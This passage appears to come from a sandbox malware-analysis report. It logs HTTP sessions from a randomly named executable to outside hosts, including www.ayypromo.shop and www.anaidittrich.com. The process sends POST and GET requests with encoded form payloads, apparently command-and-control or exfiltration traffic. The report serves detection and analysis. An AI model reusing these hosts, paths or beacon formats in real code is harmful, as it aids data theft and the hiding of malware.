                                        Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                        Sep 3, 2024 13:55:18.742995024 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.449766176.57.64.102806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:32.203926086 CEST746OUTPOST /rgqx/ HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.ayypromo.shop
                                        Referer: http://www.ayypromo.shop/rgqx/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 58 52 38 65 6c 49 30 49 6f 35 58 6b 4f 39 42 69 36 51 54 32 50 6c 45 57 64 4d 59 33 36 76 4a 36 77 3d 3d
                                        Data Ascii: r8=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==
                                        Sep 3, 2024 13:55:32.808111906 CEST1147INHTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=65GLpdxqIKUfNDXLufSr; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:32 GMT
                                        Date: Tue, 03 Sep 2024 11:55:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 738
                                        Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                                        ETag: "2e2-620a674a57ae6"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                        Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.449767176.57.64.102806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:34.755059958 CEST766OUTPOST /rgqx/ HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.ayypromo.shop
                                        Referer: http://www.ayypromo.shop/rgqx/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 42 33 4c 61 46 73 36 35 53 41 68 36 7a 64 31 44 39 4e 32 2f 73 4e 47 54 46 68 48 69 69 74 4b 66 55 3d
                                        Data Ascii: r8=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=
                                        Sep 3, 2024 13:55:35.408145905 CEST749INHTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=DUVd7I6PGCsU5C6IHULx; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:35 GMT
                                        Date: Tue, 03 Sep 2024 11:55:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 340
                                        Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                        ETag: "154-56d5bbe607fc0"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.449768176.57.64.102806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:37.298063993 CEST10848OUTPOST /rgqx/ HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.ayypromo.shop
                                        Referer: http://www.ayypromo.shop/rgqx/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 62 4e 77 32 50 63 76 58 72 35 2f 38 35 33 44 68 59 66 42 37 78 4e 6b 6a 39 6f 48 48 6a 45 6c 43 77 65 48 59 6f 2b 4d 45 2b 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 43 4a 74 37 64 30 37 36 62 70 56 55 78 75 6c 42 58 54 66 72 74 34 48 2b 48 43 79 70 55 54 43 71 42 69 58 38 50 68 55 67 68 4b 39 4f 31 4b 47 53 50 72 6b 46 68 6f 66 39 30 5a 5a 66 6d 39 4c 53 32 4a 78 59 68 61 66 74 55 38 67 43 4d 6a 49 72 33 39 55 71 [TRUNCATED]
                                        Data Ascii: r8=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXSip4BEArEQLZOP/KbX5yvU9ieF8UYbgwOOxQr30g1B1arXJLT1mGbNtB33j6lFJsqI/amgVsM2ALchWBuM7J06hGU2FXMXU+C9bxJNSA7vU6kEh62dPb5L2m0DekEJWJVs+MpqnbNw2PcvXr5/853DhYfB7xNkj9oHHjElCweHYo+ME+xMhmxaR63MJ36kUqht80gRvsxAEICgHEmCJt7d076bpVUxulBXTfrt4H+HCypUTCqBiX8PhUghK9O1KGSPrkFhof90ZZfm9LS2JxYhaftU8gCMjIr39UqIpDeKx6HflYx0y49EFCsKsQtgWfS5I9rkvrNGxzlXF7eApF1CQD19JAQitKRH5dHq9kJcmnAPkkMq+aGmQBF+D3yglJcz2eKIF2YhishDGWW+EGRMH6QnBth0LzsF5aSG3Xc8x+PHeJ3jixmEQV0REcEOmAqHXYcEzBS1o5Ekq/VZyQOB73195TME3MZgOQKbmMop5gag5Y6Eh0Rbvn40eOZvo7ezA6Kv0fqTCjQSggLxyJ9lomL6MOdrbgR7V2LyxyM+/mBZj8IJWTuFLLpJe7RIfnO67iYZe9BRnKFbYECvfJ6UE0xe7I3B4wY/COK6fVCSavV0O5u5C7rKUTJxdwft8OUF2QAH+x7GwWIQwBL662Db5iNa2/Y+5DcY0fvap4jRdYVbVeBrepuFqDvZEUXNbQQ+kniTFCJAYfBKrsGVb+hpNepyZ6TS1jf2bRaWsvCX7vWjgWFaXIXjybLUVgCWR6GKOYSyIl6L4SP5UlPkyHLgQdsbW3x9oJtr4q8sHavr29S0+XYeCdjxCHRDz2tz4Ga8lCnIWn+Ex4IhxJiuS++BlKwxWTTAV73HEf78mieFzT6fYMZAJAhngeHQZ5ahPa0bzhxy4mUjvd/bzXiD9uDSsn+rodTSCWJlbUAng/6+loRHMQElV4Xywc3v7M4jO1qCZE1SG [TRUNCATED]
                                        Sep 3, 2024 13:55:38.206471920 CEST749INHTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=b79WM5bSCFzaMTgsLNad; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:37 GMT
                                        Date: Tue, 03 Sep 2024 11:55:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 340
                                        Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                        ETag: "154-56d5bbe607fc0"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.449769176.57.64.102806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:39.842088938 CEST483OUTGET /rgqx/?r8=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.ayypromo.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:40.610522032 CEST749INHTTP/1.1 404 Not Found
                                        Server: ddos-guard
                                        Connection: close
                                        Set-Cookie: __ddg1_=L4d9MHzEOK0iFyOaxbUN; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 03-Sep-2025 11:55:40 GMT
                                        Date: Tue, 03 Sep 2024 11:55:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 340
                                        Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                        ETag: "154-56d5bbe607fc0"
                                        Accept-Ranges: bytes
                                        X-Frame-Options: SAMEORIGIN
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.449770162.55.254.209806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:45.687086105 CEST755OUTPOST /qpwk/ HTTP/1.1
                                        Host: www.anaidittrich.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.anaidittrich.com
                                        Referer: http://www.anaidittrich.com/qpwk/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 6d 44 4c 55 39 43 59 70 39 77 52 61 70 58 32 69 68 39 57 43 6c 4f 69 52 72 61 34 58 73 61 4c 6a 77 3d 3d
                                        Data Ascii: r8=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8ZdrrmDLU9CYp9wRapX2ih9WClOiRra4XsaLjw==
                                        Sep 3, 2024 13:55:46.366858959 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:55:46 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                                        Upgrade: h2c
                                        Connection: Upgrade, close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                                        Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                                        Sep 3, 2024 13:55:46.366880894 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                                        Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                                        Sep 3, 2024 13:55:46.366906881 CEST448INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                                        Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                                        Sep 3, 2024 13:55:46.366918087 CEST1236INData Raw: 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63
                                        Data Ascii: f3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(
                                        Sep 3, 2024 13:55:46.366935015 CEST1236INData Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22
                                        Data Ascii: "undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObje
